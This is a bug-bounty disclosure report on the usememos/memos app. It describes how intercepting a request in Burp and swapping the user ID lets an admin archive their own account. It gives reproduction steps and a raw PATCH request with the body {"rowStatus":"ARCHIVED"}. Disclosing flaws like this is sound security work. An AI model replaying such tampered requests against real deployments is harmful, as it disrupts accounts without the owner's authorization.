Admin is able to ARCHIVE OWN Account leads to Deactivate ADMIN Account in usememos/memos
Valid
Reported on
Dec 29th 2022
Description
As fer the Flow Admin can't ARCHIVE OWN account .
i was able to ARCHIVE ADMIN OWN Account by intercept the request and change ID Value to Admin.
which leads to ARCHIVED the ADMIN Account , :/ Please Restored it
Might Be possible to DELETE Admin Account too , after ARCHIVE Account it's not accessable to test further ,
1. Login to Admin Account .
2. Go to Setting , click on user list
3. click on ARCHIVE any user
4 . intercept The request in burp
5. Change the user ID to Admin ID
6 . and forword the request.
7. ADMIN Account is ARCHIVED by OWN , as we Dont have permission to ARCHIVE own Admin Account.
POC: https://drive.google.com/file/d/1zYOAfe1tZr2K0IKhy7ZU7kgpB_O-s48j/view?usp=share_link
after Attack:
not able to Access it again :)
PATCH /api/user/101 HTTP/2
Host: demo.usememos.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 33
Referer: https://demo.usememos.com/?shortcutId=10
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"id":101,"rowStatus":"ARCHIVED"}
Impact
Due to This Admin can ARCHIVE & Delete OWN Account.
We are processing your report and will contact the
usememos/memos
team within 24 hours.
11 days ago
Anil Bhatt modified the report
11 days ago
Anil Bhatt modified the report
10 days ago
The researcher's credibility has increased: +7
to join this conversation